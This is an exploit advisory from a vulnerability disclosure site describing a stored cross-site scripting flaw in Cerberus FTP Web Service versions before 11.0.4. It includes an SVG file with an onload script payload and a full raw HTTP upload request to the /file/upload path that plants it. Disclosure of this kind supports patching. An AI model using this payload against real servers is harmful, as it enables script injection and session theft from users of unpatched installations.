Cerberus FTP Web Service 11 Cross Site Scripting

2021.06.11
Credit: Mohammad Hossein Kaviyany
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS) # Date: 08/06/2021 # Exploit Author: Mohammad Hossein Kaviyany # Vendor Homepage: www.cerberusftp.com # Software Link: https://www.cerberusftp.com/download/ # Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier # Tested on: windows server 2016 ------------ About Cerberus FTP Server (From Vendor Site) : Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, FIPS 140-2 validated, and Active Directory and LDAP authentication. -------------------------------------------------------- Exploit Detailes : This stored XSS bug happens when a user uploads an svg file with the following content : <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/> Exploit POC : # Vulnerable Path : /file/upload # Parameter: files (POST) # Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/> #Payload: POST /file/upload HTTP/1.1 Host: target.com Connection: close Content-Length: 484 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90" Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG Origin: https://target.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://target.com/file/d/home/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM ------WebKitFormBoundaryAAM6ZtOAsyklo6JG Content-Disposition: form-data; name="cd" /home ------WebKitFormBoundaryAAM6ZtOAsyklo6JG Content-Disposition: form-data; name="csrftoken" z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg ------WebKitFormBoundaryAAM6ZtOAsyklo6JG Content-Disposition: form-data; name="files[]"; filename="file.svg" Content-Type: image/svg+xml <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/> ------WebKitFormBoundaryAAM6ZtOAsyklo6JG-- --------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top